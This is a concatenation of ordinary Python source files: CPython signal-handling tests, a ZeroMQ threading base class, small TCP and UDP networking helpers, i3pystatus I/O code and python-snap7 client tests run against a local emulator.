@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_timeout(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
received = signal.sigtimedwait([signum], 1.0)
if received is not None:
raise Exception("received=%r" % (received,))
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_negative_timeout(self):
signum = signal.SIGALRM
self.assertRaises(ValueError, signal.sigtimedwait, [signum], -1.0)
@unittest.skipUnless(hasattr(signal, 'sigwait'),
'need signal.sigwait()')
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_sigwait_thread(self):
# Check that calling sigwait() from a thread doesn't suspend the whole
# process. A new interpreter is spawned to avoid problems when mixing
# threads and fork(): only async-safe functions are allowed between
# fork() and exec().
assert_python_ok("-c", """if True:
import os, threading, sys, time, signal
# the default handler terminates the process
signum = signal.SIGUSR1
def kill_later():
# wait until the main thread is waiting in sigwait()
time.sleep(1)
os.kill(os.getpid(), signum)
# the signal must be blocked by all the threads
signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
killer = threading.Thread(target=kill_later)
killer.start()
received = signal.sigwait([signum])
if received != signum:
print("sigwait() received %s, not %s" % (received, signum),
file=sys.stderr)
sys.exit(1)
killer.join()
# unblock the signal, which should have been cleared by sigwait()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
""")
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask_arguments(self):
self.assertRaises(TypeError, signal.pthread_sigmask)
self.assertRaises(TypeError, signal.pthread_sigmask, 1)
self.assertRaises(TypeError, signal.pthread_sigmask, 1, 2, 3)
self.assertRaises(OSError, signal.pthread_sigmask, 1700, [])
with self.assertRaises(ValueError):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.NSIG])
with self.assertRaises(ValueError):
signal.pthread_sigmask(signal.SIG_BLOCK, [0])
with self.assertRaises(ValueError):
signal.pthread_sigmask(signal.SIG_BLOCK, [1<<1000])
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask_valid_signals(self):
s = signal.pthread_sigmask(signal.SIG_BLOCK, signal.valid_signals())
self.addCleanup(signal.pthread_sigmask, signal.SIG_SETMASK, s)
# Get current blocked set
s = signal.pthread_sigmask(signal.SIG_UNBLOCK, signal.valid_signals())
self.assertLessEqual(s, signal.valid_signals())
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask(self):
code = """if 1:
import signal
import os; import threading
def handler(signum, frame):
1/0
def kill(signum):
os.kill(os.getpid(), signum)
def check_mask(mask):
for sig in mask:
assert isinstance(sig, signal.Signals), repr(sig)
def read_sigmask():
sigmask = signal.pthread_sigmask(signal.SIG_BLOCK, [])
check_mask(sigmask)
return sigmask
signum = signal.SIGUSR1
# Install our signal handler
old_handler = signal.signal(signum, handler)
# Unblock SIGUSR1 (and copy the old mask) to test our signal handler
old_mask = signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
check_mask(old_mask)
try:
kill(signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
# Block and then raise SIGUSR1. The signal is blocked: the signal
# handler is not called, and the signal is now pending
mask = signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
check_mask(mask)
kill(signum)
# Check the new mask
blocked = read_sigmask()
check_mask(blocked)
if signum not in blocked:
raise Exception("%s not in %s" % (signum, blocked))
if old_mask ^ blocked != {signum}:
raise Exception("%s ^ %s != {%s}" % (old_mask, blocked, signum))
# Unblock SIGUSR1
try:
# unblock the pending signal calls immediately the signal handler
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
try:
kill(signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
# Check the new mask
unblocked = read_sigmask()
if signum in unblocked:
raise Exception("%s in %s" % (signum, unblocked))
if blocked ^ unblocked != {signum}:
raise Exception("%s ^ %s != {%s}" % (blocked, unblocked, signum))
if old_mask != unblocked:
raise Exception("%s != %s" % (old_mask, unblocked))
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_kill'),
'need signal.pthread_kill()')
def test_pthread_kill_main_thread(self):
# Test that a signal can be sent to the main thread with pthread_kill()
# before any other thread has been created (see issue #12392).
code = """if True:
import threading
import signal
import sys
def handler(signum, frame):
sys.exit(3)
signal.signal(signal.SIGUSR1, handler)
signal.pthread_kill(threading.get_ident(), signal.SIGUSR1)
sys.exit(2)
"""
with spawn_python('-c', code) as process:
stdout, stderr = process.communicate()
exitcode = process.wait()
if exitcode != 3:
raise Exception("Child error (exit code %s): %s" %
(exitcode, stdout))
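# Illustrative sketch, not part of the test suite: the block-then-sigwait()
# pattern exercised by the tests above, used as a simple "sleep until told to
# stop" helper. SIGTERM and SIGINT are example signals; POSIX is assumed and,
# as in the tests, the signals must stay blocked while sigwait() runs.
def _wait_for_shutdown_signal():
    stop_signals = {signal.SIGTERM, signal.SIGINT}
    signal.pthread_sigmask(signal.SIG_BLOCK, stop_signals)
    try:
        # Blocks until one of the signals is delivered and returns it.
        return signal.Signals(signal.sigwait(stop_signals))
    finally:
        signal.pthread_sigmask(signal.SIG_UNBLOCK, stop_signals)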
class StressTest(unittest.TestCase):
"""
Stress signal delivery, especially when a signal arrives in
the middle of recomputing the signal state or executing
previously tripped signal handlers.
"""
def setsig(self, signum, handler):
old_handler = signal.signal(signum, handler)
self.addCleanup(signal.signal, signum, old_handler)
def measure_itimer_resolution(self):
N = 20
times = []
def handler(signum=None, frame=None):
if len(times) < N:
times.append(time.perf_counter())
# 1 µs is the smallest possible timer interval,
# we want to measure what the concrete duration
# will be on this platform
signal.setitimer(signal.ITIMER_REAL, 1e-6)
self.addCleanup(signal.setitimer, signal.ITIMER_REAL, 0)
self.setsig(signal.SIGALRM, handler)
handler()
while len(times) < N:
time.sleep(1e-3)
durations = [times[i+1] - times[i] for i in range(len(times) - 1)]
med = statistics.median(durations)
if support.verbose:
print("detected median itimer() resolution: %.6f s." % (med,))
return med
def decide_itimer_count(self):
# Some systems have poor setitimer() resolution (for example
# measured around 20 ms. on FreeBSD 9), so decide on a reasonable
# number of sequential timers based on that.
reso = self.measure_itimer_resolution()
if reso <= 1e-4:
return 10000
elif reso <= 1e-2:
return 100
else:
self.skipTest("detected itimer resolution (%.3f s.) too high "
"(> 10 ms.) on this platform (or system too busy)"
% (reso,))
@unittest.skipUnless(hasattr(signal, "setitimer"),
"test needs setitimer()")
def test_stress_delivery_dependent(self):
"""
This test uses dependent signal handlers.
"""
N = self.decide_itimer_count()
sigs = []
def first_handler(signum, frame):
# 1e-6 is the minimum non-zero value for `setitimer()`.
# Choose a random delay so as to improve chances of
# triggering a race condition. Ideally the signal is received
# when inside critical signal-handling routines such as
# Py_MakePendingCalls().
signal.setitimer(signal.ITIMER_REAL, 1e-6 + random.random() * 1e-5)
def second_handler(signum=None, frame=None):
sigs.append(signum)
# Here on Linux, SIGPROF > SIGALRM > SIGUSR1. By using both
# ascending and descending sequences (SIGUSR1 then SIGALRM,
# SIGPROF then SIGALRM), we maximize chances of hitting a bug.
self.setsig(signal.SIGPROF, first_handler)
self.setsig(signal.SIGUSR1, first_handler)
self.setsig(signal.SIGALRM, second_handler) # for ITIMER_REAL
expected_sigs = 0
deadline = time.monotonic() + 15.0
while expected_sigs < N:
os.kill(os.getpid(), signal.SIGPROF)
expected_sigs += 1
# Wait for handlers to run to avoid signal coalescing
while len(sigs) < expected_sigs and time.monotonic() < deadline:
time.sleep(1e-5)
os.kill(os.getpid(), signal.SIGUSR1)
expected_sigs += 1
while len(sigs) < expected_sigs and time.monotonic() < deadline:
time.sleep(1e-5)
# All ITIMER_REAL signals should have been delivered to the
# Python handler
self.assertEqual(len(sigs), N, "Some signals were lost")
@unittest.skipUnless(hasattr(signal, "setitimer"),
"test needs setitimer()")
def test_stress_delivery_simultaneous(self):
"""
This test uses simultaneous signal handlers.
"""
N = self.decide_itimer_count()
sigs = []
def handler(signum, frame):
sigs.append(signum)
self.setsig(signal.SIGUSR1, handler)
self.setsig(signal.SIGALRM, handler) # for ITIMER_REAL
expected_sigs = 0
deadline = time.monotonic() + 15.0
while expected_sigs < N:
# Hopefully the SIGALRM will be received somewhere during
# initial processing of SIGUSR1.
signal.setitimer(signal.ITIMER_REAL, 1e-6 + random.random() * 1e-5)
os.kill(os.getpid(), signal.SIGUSR1)
expected_sigs += 2
# Wait for handlers to run to avoid signal coalescing
while len(sigs) < expected_sigs and time.monotonic() < deadline:
time.sleep(1e-5)
# All ITIMER_REAL signals should have been delivered to the
# Python handler
self.assertEqual(len(sigs), N, "Some signals were lost")
def tearDownModule():
support.reap_children()
if __name__ == "__main__":
unittest.main()
|
_base.py
|
# pylint: disable=missing-docstring
# pylint: enable=missing-docstring
# Copyright 2018 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import uuid
import zmq
LOGGER = logging.getLogger(__name__)
class Base:
"""
Base class for running a ZeroMQ event loop in a background thread with a PAIR channel for
cancelling the background thread.
Parameters
----------
start : bool
Whether to start the event loop as a background thread.
"""
def __init__(self, start):
self._thread = None
self._cancel_address = f'inproc://{uuid.uuid4().hex}'
self._cancel_parent = zmq.Context.instance().socket(zmq.PAIR) # pylint: disable=E1101
self._cancel_parent.bind(self._cancel_address)
if start:
self.run_async()
STATUS = {
'ok': b'\x00',
'end': b'\x01',
'error': b'\x02',
'timeout': b'\x03',
'serialization_error': b'\x04',
}
STATUS.update({value: key for key, value in STATUS.items()})
def __enter__(self):
self.run_async()
return self
def __exit__(self, *_):
self.cancel()
@property
def is_alive(self):
"""
bool : Whether the background thread is alive.
"""
return self._thread is not None and self._thread.is_alive()
def cancel(self, timeout=None):
"""
Cancel the event loop running in a background thread.
Parameters
----------
timeout : float
Timeout for joining the background thread.
Returns
-------
cancelled : bool
Whether the background thread was cancelled. `False` if the background thread was not
running.
"""
if self.is_alive:
self._cancel_parent.send_multipart([b''])
self._thread.join(timeout)
self._cancel_parent.close()
return True
return False
def run_async(self):
"""
Run the event loop in a background thread.
"""
if not self.is_alive:
self._thread = threading.Thread(target=self.run, daemon=True)
self._thread.start()
return self._thread
def run(self):
"""
Run the event loop.
Notes
-----
This call is blocking.
"""
raise NotImplementedError
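# A minimal sketch, not part of the library, of how a subclass might implement
# ``run``: it connects its own PAIR socket to the cancel address and leaves the
# event loop as soon as ``cancel`` sends the cancellation message on the parent
# socket. The one-second poll timeout is an arbitrary illustration value.
# Typical use: ``with _ExampleLoop(start=False): ...`` (the context manager
# starts the loop on entry and cancels it on exit).
class _ExampleLoop(Base):
    def run(self):
        cancel_child = zmq.Context.instance().socket(zmq.PAIR)  # pylint: disable=E1101
        cancel_child.connect(self._cancel_address)
        poller = zmq.Poller()
        poller.register(cancel_child, zmq.POLLIN)
        try:
            while True:
                events = dict(poller.poll(1000))
                if cancel_child in events:
                    # Drain the cancellation message sent by ``cancel`` and stop.
                    cancel_child.recv_multipart()
                    break
                # A real subclass would service its own sockets here.
        finally:
            cancel_child.close()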
|
featurequeue.py
|
import json
import queue
import socketserver
import threading
import time
import sys
sys.path.append(".")
import ai.common
import ai.feature
class TCPMessageHandler(socketserver.StreamRequestHandler):
def handle(self):
self.data = self.rfile.readline().strip()
self.feature = ai.feature.Feature.from_json(self.data)
#print("{} wrote:".format(self.client_address[0]))
#print(self.feature.to_json())
FeatureQueue.put(self.feature)
self.wfile.write(bytes("OK: " + self.feature.to_json(), "utf-8"))
class FeatureQueue():
feature_queue = queue.PriorityQueue(maxsize=100)
@staticmethod
def start_server_sync():
print("Binding address...")
while True:
try:
server = socketserver.TCPServer((ai.common.HOST, ai.common.PORT), TCPMessageHandler)
break
except OSError:
time.sleep(1)
continue
print("Starting server")
try:
server.serve_forever()
finally:
print("Closing server")
server.server_close()
@staticmethod
def start_server():
thread = threading.Thread(target=FeatureQueue.start_server_sync)
thread.start()
@classmethod
def put(cls, feature):
if cls.feature_queue.full():
cls.feature_queue.queue.pop()
cls.feature_queue.put((feature.type, feature), block=False)
@classmethod
def get(cls):
return cls.feature_queue.get(block=False)
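# Client-side sketch, not part of this module: the handler above reads exactly
# one newline-terminated JSON document per connection and replies with an
# "OK: ..." echo. The payload must be whatever ai.feature.Feature.from_json()
# accepts, so any dict passed in here is a hypothetical example.
def send_feature_json(payload):
    import socket
    with socket.create_connection((ai.common.HOST, ai.common.PORT)) as conn:
        conn.sendall(json.dumps(payload).encode("utf-8") + b"\n")
        return conn.recv(4096).decode("utf-8")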
if __name__ == "__main__":
FeatureQueue.start_server()
print("Server started")
|
io.py
|
import json
import signal
import sys
from contextlib import contextmanager
from threading import Condition
from threading import Thread
class IOHandler:
def __init__(self, inp=sys.stdin, out=sys.stdout):
self.inp = inp
self.out = out
def write_line(self, message):
"""Unbuffered printing to stdout."""
self.out.write(message + "\n")
self.out.flush()
def read(self):
"""Iterate over all input lines (Generator)"""
while True:
try:
yield self.read_line()
except EOFError:
return
def read_line(self):
"""
Interrupted respecting reader for stdin.
Raises EOFError if the end of stream has been reached
"""
try:
line = self.inp.readline().strip()
except KeyboardInterrupt:
raise EOFError()
# i3status sends EOF, or an empty line
if not line:
raise EOFError()
return line
class StandaloneIO(IOHandler):
"""
I/O handler for standalone usage of i3pystatus (w/o i3status)
    Writing works as usual, but reading yields the i3bar protocol header
    first and then only empty JSON arrays
"""
n = -1
proto = [
{"version": 1, "click_events": True}, "[", "[]", ",[]",
]
def __init__(self, click_events, modules, interval=1):
"""
StandaloneIO instance must be created in main thread to be able to set
the SIGUSR1 signal handler.
"""
super().__init__()
self.interval = interval
self.modules = modules
self.proto[0]['click_events'] = click_events
self.proto[0] = json.dumps(self.proto[0])
self.refresh_cond = Condition()
self.treshold_interval = 20.0
signal.signal(signal.SIGUSR1, self.refresh_signal_handler)
def read(self):
self.compute_treshold_interval()
self.refresh_cond.acquire()
while True:
try:
self.refresh_cond.wait(timeout=self.interval)
except KeyboardInterrupt:
self.refresh_cond.release()
return
yield self.read_line()
def read_line(self):
self.n += 1
return self.proto[min(self.n, len(self.proto) - 1)]
def compute_treshold_interval(self):
"""
Current method is to compute average from all intervals.
"""
intervals = [m.interval for m in self.modules if hasattr(m, "interval")]
if len(intervals) > 0:
self.treshold_interval = round(sum(intervals) / len(intervals))
def async_refresh(self):
"""
Calling this method will send the status line to i3bar immediately
without waiting for timeout (1s by default).
"""
self.refresh_cond.acquire()
self.refresh_cond.notify()
self.refresh_cond.release()
def refresh_signal_handler(self, signo, frame):
"""
This callback is called when SIGUSR1 signal is received.
It updates outputs of all modules by calling their `run` method.
        Interval modules are updated in separate threads if their interval is
        above a certain threshold value.
        This threshold is computed by the :func:`compute_treshold_interval`
        method.
The reasoning is that modules with larger intervals also usually take
longer to refresh their output and that their output is not required in
'real time'.
This also prevents possible lag when updating all modules in a row.
"""
if signo != signal.SIGUSR1:
return
for module in self.modules:
if hasattr(module, "interval"):
if module.interval > self.treshold_interval:
thread = Thread(target=module.run)
thread.start()
else:
module.run()
else:
module.run()
self.async_refresh()
class JSONIO:
def __init__(self, io, skiplines=2):
self.io = io
for i in range(skiplines):
self.io.write_line(self.io.read_line())
def read(self):
"""Iterate over all JSON input (Generator)"""
for line in self.io.read():
with self.parse_line(line) as j:
yield j
@contextmanager
def parse_line(self, line):
"""Parse a single line of JSON and write modified JSON back."""
prefix = ""
# ignore comma at start of lines
if line.startswith(","):
line, prefix = line[1:], ","
j = json.loads(line)
yield j
self.io.write_line(prefix + json.dumps(j))
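# --- Hypothetical wiring sketch (not part of the original module) ---
# Shows how StandaloneIO and JSONIO are assumed to fit together: JSONIO
# echoes the first two protocol lines (header and opening "["), after
# which each parsed status array can be modified in place and is written
# back by the parse_line context manager. Must run in the main thread
# because StandaloneIO installs a SIGUSR1 handler.
def _example_standalone_loop(modules):
    io_handler = StandaloneIO(click_events=True, modules=modules, interval=1)
    json_io = JSONIO(io_handler)
    for blocks in json_io.read():
        blocks.append({"full_text": "hello from i3pystatus"})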
|
transport.py
|
import traceback, sys
from socket import socket as Socket, error as SocketError, AF_INET, SOCK_DGRAM
from threading import Thread, Event, Lock
from struct import unpack, pack_into
from sys import exc_info
from config import *
ITEM_SIZE_IN_BYTES = 8
SENSORS_CALIBRATED_VAR = 100
class Transport:
def __init__(self, nDataItemsCount):
self.receiverStopped = Event() # Create event
self.receiverStopped.set() # Set event up
self.cbkLock = Lock()
self.threadKill = Event()
self.socketIN = None
self.socketOUT = None
self.nDataItemsCount = nDataItemsCount
self.mapReceivedCbk = {}
def registerCallback(self, cbkOwner, cbk):
self.cbkLock.acquire(True)
try:
self.mapReceivedCbk[cbkOwner] = cbk
finally:
self.cbkLock.release()
def unRegisterCallback(self, cbkOwner):
self.cbkLock.acquire(True)
try:
self.mapReceivedCbk.pop(cbkOwner, None)
finally:
self.cbkLock.release()
def doConnect(self, client, server):
bRet = False
try:
self.socketOUT = Socket(AF_INET, SOCK_DGRAM)
self.socketOUT.connect(server)
self.socketIN = Socket(AF_INET, SOCK_DGRAM)
self.socketIN.bind(client)
bRet = True
self.threadKill.clear()
receiver = Thread(target = self.receiverMain, args = (self,))
receiver.daemon = True
receiver.setName("RecvThread")
receiver.start()
except SocketError:
pass
return bRet
def doSend(self, lstValues):
nSent = 0
if None != self.socketOUT:
packetData = bytearray(lstValues.__len__() * ITEM_SIZE_IN_BYTES)
nOffset = 0
for strValue in lstValues:
print "Sending Value:" + str(strValue)
pack_into('>d', packetData, nOffset, float(strValue))
nOffset += ITEM_SIZE_IN_BYTES
nSent = self.socketOUT.send(packetData)
return nSent
def doDisconnect(self):
self.threadKill.set()
while not self.receiverStopped.wait(1):
pass
bRet = False
if None != self.socketOUT:
self.socketOUT.close()
self.socketOUT = None
bRet = True
if None != self.socketIN:
self.socketIN.close()
self.socketIN = None
bRet = True
return bRet
def flushSocket(self):
        while True:
            try:
                # Drain any pending datagrams from the non-blocking socket
                self.socketIN.recv(ITEM_SIZE_IN_BYTES * self.nDataItemsCount * 10)
            except SocketError:
                break
    def receiverMain(self, kwArgs): # Receive loop: unpack incoming sensor frames and dispatch them to registered callbacks
self.receiverStopped.clear()
self.socketIN.setblocking(0)
while not self.threadKill.wait(1.0 / MAX_FRAMES_PER_SEC_TO_RECEIVE):
if None != self.socketIN:
nBufferLen = ITEM_SIZE_IN_BYTES * self.nDataItemsCount
buffer = bytearray(nBufferLen)
try:
                    # Try to read data from the socket into the buffer
lstServerData = []
self.socketIN.recv_into(buffer, nBufferLen)
# Remove all data waiting in the socket, since server can send data more frequently than we read it
self.flushSocket()
# Unpacking data from buffer and adding data in lstServerData
for i in range(self.nDataItemsCount):
dataItem = unpack('>d', buffer[i * ITEM_SIZE_IN_BYTES: (i + 1) * ITEM_SIZE_IN_BYTES])
lstServerData.append(dataItem[0] * SENSORS_CALIBRATED_VAR) # REMOVE WHEN ACTUATORS CALIBRATED * 100
# Notify UI
self.cbkLock.acquire(True)
try:
for cbk in self.mapReceivedCbk.values():
try:
cbk(lstServerData)
                        except Exception:
                            print("Failed to execute callback!")
                            traceback.print_exc(file=sys.stdout)
finally:
self.cbkLock.release()
except SocketError as e:
pass
self.receiverStopped.set()
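# --- Hypothetical wire-format sketch (not part of the original module) ---
# Each item on the UDP link is an 8-byte big-endian double ('>d'), so a
# packet carrying nDataItemsCount values is just the concatenation of
# those doubles; the helper names below are illustrative only.
def pack_items(values):
    packet = bytearray(len(values) * ITEM_SIZE_IN_BYTES)
    for index, value in enumerate(values):
        pack_into('>d', packet, index * ITEM_SIZE_IN_BYTES, float(value))
    return packet
def unpack_items(packet, count):
    return [unpack('>d', packet[i * ITEM_SIZE_IN_BYTES:(i + 1) * ITEM_SIZE_IN_BYTES])[0]
            for i in range(count)]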
|
test_client.py
|
import ctypes
import gc
import logging
import struct
import time
import unittest
import platform
from datetime import datetime, timedelta, date
from multiprocessing import Process
from unittest import mock
import snap7
from snap7 import util
from snap7.exceptions import Snap7Exception
from snap7.common import check_error
from snap7.server import mainloop
from snap7.types import S7AreaDB, S7WLByte, S7DataItem, S7SZL, S7SZLList, buffer_type, buffer_size, S7Object, Areas, WordLen
logging.basicConfig(level=logging.WARNING)
ip = '127.0.0.1'
tcpport = 1102
db_number = 1
rack = 1
slot = 1
class TestClient(unittest.TestCase):
process = None
@classmethod
def setUpClass(cls):
cls.process = Process(target=mainloop)
cls.process.start()
time.sleep(2) # wait for server to start
@classmethod
def tearDownClass(cls):
cls.process.terminate()
cls.process.join(1)
if cls.process.is_alive():
cls.process.kill()
def setUp(self):
self.client = snap7.client.Client()
self.client.connect(ip, rack, slot, tcpport)
def tearDown(self):
self.client.disconnect()
self.client.destroy()
def _as_check_loop(self, check_times=20) -> int:
check_status = ctypes.c_int(-1)
        # poll the server until the asynchronous request reports completion
for i in range(check_times):
self.client.check_as_completion(ctypes.byref(check_status))
if check_status.value == 0:
break
time.sleep(0.5)
else:
raise Snap7Exception(f"Async Request not finished after {check_times} times - Fail")
return check_status.value
def test_db_read(self):
size = 40
start = 0
db = 1
data = bytearray(40)
self.client.db_write(db_number=db, start=start, data=data)
result = self.client.db_read(db_number=db, start=start, size=size)
self.assertEqual(data, result)
def test_db_write(self):
size = 40
data = bytearray(size)
self.client.db_write(db_number=1, start=0, data=data)
def test_db_get(self):
self.client.db_get(db_number=db_number)
def test_read_multi_vars(self):
db = 1
# build and write test values
test_value_1 = 129.5
test_bytes_1 = bytearray(struct.pack('>f', test_value_1))
self.client.db_write(db, 0, test_bytes_1)
test_value_2 = -129.5
test_bytes_2 = bytearray(struct.pack('>f', test_value_2))
self.client.db_write(db, 4, test_bytes_2)
test_value_3 = 123
test_bytes_3 = bytearray([0, 0])
util.set_int(test_bytes_3, 0, test_value_3)
self.client.db_write(db, 8, test_bytes_3)
test_values = [test_value_1, test_value_2, test_value_3]
# build up our requests
data_items = (S7DataItem * 3)()
data_items[0].Area = ctypes.c_int32(S7AreaDB)
data_items[0].WordLen = ctypes.c_int32(WordLen.Byte.value)
data_items[0].Result = ctypes.c_int32(0)
data_items[0].DBNumber = ctypes.c_int32(db)
data_items[0].Start = ctypes.c_int32(0)
data_items[0].Amount = ctypes.c_int32(4) # reading a REAL, 4 bytes
data_items[1].Area = ctypes.c_int32(S7AreaDB)
data_items[1].WordLen = ctypes.c_int32(WordLen.Byte.value)
data_items[1].Result = ctypes.c_int32(0)
data_items[1].DBNumber = ctypes.c_int32(db)
data_items[1].Start = ctypes.c_int32(4)
data_items[1].Amount = ctypes.c_int32(4) # reading a REAL, 4 bytes
data_items[2].Area = ctypes.c_int32(S7AreaDB)
data_items[2].WordLen = ctypes.c_int32(WordLen.Byte.value)
data_items[2].Result = ctypes.c_int32(0)
data_items[2].DBNumber = ctypes.c_int32(db)
data_items[2].Start = ctypes.c_int32(8)
data_items[2].Amount = ctypes.c_int32(2) # reading an INT, 2 bytes
# create buffers to receive the data
# use the Amount attribute on each item to size the buffer
for di in data_items:
# create the buffer
dataBuffer = ctypes.create_string_buffer(di.Amount)
# get a pointer to the buffer
pBuffer = ctypes.cast(ctypes.pointer(dataBuffer),
ctypes.POINTER(ctypes.c_uint8))
di.pData = pBuffer
result, data_items = self.client.read_multi_vars(data_items)
result_values = []
# function to cast bytes to match data_types[] above
byte_to_value = [util.get_real, util.get_real, util.get_int]
# unpack and test the result of each read
for i in range(len(data_items)):
btv = byte_to_value[i]
di = data_items[i]
value = btv(di.pData, 0)
result_values.append(value)
self.assertEqual(result_values[0], test_values[0])
self.assertEqual(result_values[1], test_values[1])
self.assertEqual(result_values[2], test_values[2])
def test_upload(self):
"""
        This raises an exception, presumably due to missing authorization or
        because upload is not implemented in the server emulator.
"""
self.assertRaises(Snap7Exception, self.client.upload, db_number)
def test_as_upload(self):
_buffer = buffer_type()
size = ctypes.c_int(ctypes.sizeof(_buffer))
self.client.as_upload(1, _buffer, size)
self.assertRaises(Snap7Exception, self.client.wait_as_completion, 500)
@unittest.skip("TODO: invalid block size")
def test_download(self):
data = bytearray(1024)
self.client.download(block_num=db_number, data=data)
def test_read_area(self):
amount = 1
start = 1
# Test read_area with a DB
area = Areas.DB
dbnumber = 1
data = bytearray(b'\x11')
self.client.write_area(area, dbnumber, start, data)
res = self.client.read_area(area, dbnumber, start, amount)
self.assertEqual(data, bytearray(res))
# Test read_area with a TM
area = Areas.TM
dbnumber = 0
data = bytearray(b'\x12\x34')
self.client.write_area(area, dbnumber, start, data)
res = self.client.read_area(area, dbnumber, start, amount)
self.assertEqual(data, bytearray(res))
# Test read_area with a CT
area = Areas.CT
dbnumber = 0
data = bytearray(b'\x13\x35')
self.client.write_area(area, dbnumber, start, data)
res = self.client.read_area(area, dbnumber, start, amount)
self.assertEqual(data, bytearray(res))
def test_write_area(self):
# Test write area with a DB
area = Areas.DB
dbnumber = 1
size = 1
start = 1
data = bytearray(b'\x11')
self.client.write_area(area, dbnumber, start, data)
res = self.client.read_area(area, dbnumber, start, 1)
self.assertEqual(data, bytearray(res))
# Test write area with a TM
area = Areas.TM
dbnumber = 0
size = 2
timer = bytearray(b'\x12\x00')
res = self.client.write_area(area, dbnumber, start, timer)
res = self.client.read_area(area, dbnumber, start, 1)
self.assertEqual(timer, bytearray(res))
# Test write area with a CT
area = Areas.CT
dbnumber = 0
size = 2
timer = bytearray(b'\x13\x00')
res = self.client.write_area(area, dbnumber, start, timer)
res = self.client.read_area(area, dbnumber, start, 1)
self.assertEqual(timer, bytearray(res))
def test_list_blocks(self):
blockList = self.client.list_blocks()
def test_list_blocks_of_type(self):
self.client.list_blocks_of_type('DB', 10)
self.assertRaises(Snap7Exception, self.client.list_blocks_of_type, 'NOblocktype', 10)
def test_get_block_info(self):
"""test Cli_GetAgBlockInfo"""
self.client.get_block_info('DB', 1)
self.assertRaises(Exception, self.client.get_block_info,
'NOblocktype', 10)
self.assertRaises(Exception, self.client.get_block_info, 'DB', 10)
def test_get_cpu_state(self):
"""this tests the get_cpu_state function"""
self.client.get_cpu_state()
def test_set_session_password(self):
password = 'abcdefgh'
self.client.set_session_password(password)
def test_clear_session_password(self):
self.client.clear_session_password()
def test_set_connection_params(self):
self.client.set_connection_params("10.0.0.2", 10, 10)
def test_set_connection_type(self):
self.client.set_connection_type(1)
self.client.set_connection_type(2)
self.client.set_connection_type(3)
self.client.set_connection_type(20)
def test_get_connected(self):
self.client.get_connected()
def test_ab_read(self):
start = 1
size = 1
data = bytearray(size)
self.client.ab_write(start=start, data=data)
self.client.ab_read(start=start, size=size)
def test_ab_write(self):
start = 1
size = 10
data = bytearray(size)
result = self.client.ab_write(start=start, data=data)
self.assertEqual(0, result)
def test_as_ab_read(self):
expected = b'\x10\x01'
self.client.ab_write(0, bytearray(expected))
wordlen = WordLen.Byte
type_ = snap7.types.wordlen_to_ctypes[wordlen.value]
buffer = (type_ * 2)()
self.client.as_ab_read(0, 2, buffer)
result = self.client.wait_as_completion(500)
self.assertEqual(0, result)
self.assertEqual(expected, bytearray(buffer))
def test_as_ab_write(self):
data = b'\x01\x11'
response = self.client.as_ab_write(0, bytearray(data))
result = self.client.wait_as_completion(500)
self.assertEqual(0, response)
self.assertEqual(0, result)
self.assertEqual(data, self.client.ab_read(0, 2))
def test_compress(self):
time_ = 1000
self.client.compress(time_)
def test_as_compress(self):
time_ = 1000
response = self.client.as_compress(time_)
result = self.client.wait_as_completion(500)
self.assertEqual(0, response)
self.assertEqual(0, result)
def test_set_param(self):
values = (
(snap7.types.PingTimeout, 800),
(snap7.types.SendTimeout, 15),
(snap7.types.RecvTimeout, 3500),
(snap7.types.SrcRef, 128),
(snap7.types.DstRef, 128),
(snap7.types.SrcTSap, 128),
(snap7.types.PDURequest, 470),
)
for param, value in values:
self.client.set_param(param, value)
self.assertRaises(Exception, self.client.set_param,
snap7.types.RemotePort, 1)
def test_get_param(self):
expected = (
(snap7.types.RemotePort, tcpport),
(snap7.types.PingTimeout, 750),
(snap7.types.SendTimeout, 10),
(snap7.types.RecvTimeout, 3000),
(snap7.types.SrcRef, 256),
(snap7.types.DstRef, 0),
(snap7.types.SrcTSap, 256),
(snap7.types.PDURequest, 480),
)
for param, value in expected:
self.assertEqual(self.client.get_param(param), value)
non_client = (snap7.types.LocalPort, snap7.types.WorkInterval, snap7.types.MaxClients,
snap7.types.BSendTimeout, snap7.types.BRecvTimeout, snap7.types.RecoveryTime,
snap7.types.KeepAliveTime)
# invalid param for client
for param in non_client:
self.assertRaises(Exception, self.client.get_param, non_client)
def test_as_copy_ram_to_rom(self):
self.client.copy_ram_to_rom(timeout=1)
def test_as_ct_read(self):
# Cli_AsCTRead
expected = b'\x10\x01'
self.client.ct_write(0, 1, bytearray(expected))
type_ = snap7.types.wordlen_to_ctypes[WordLen.Counter.value]
buffer = (type_ * 1)()
self.client.as_ct_read(0, 1, buffer)
self.client.wait_as_completion(500)
self.assertEqual(expected, bytearray(buffer))
def test_as_ct_write(self):
# Cli_CTWrite
data = b'\x01\x11'
response = self.client.as_ct_write(0, 1, bytearray(data))
result = self.client.wait_as_completion(500)
self.assertEqual(0, response)
self.assertEqual(0, result)
self.assertEqual(data, self.client.ct_read(0, 1))
def test_as_db_fill(self):
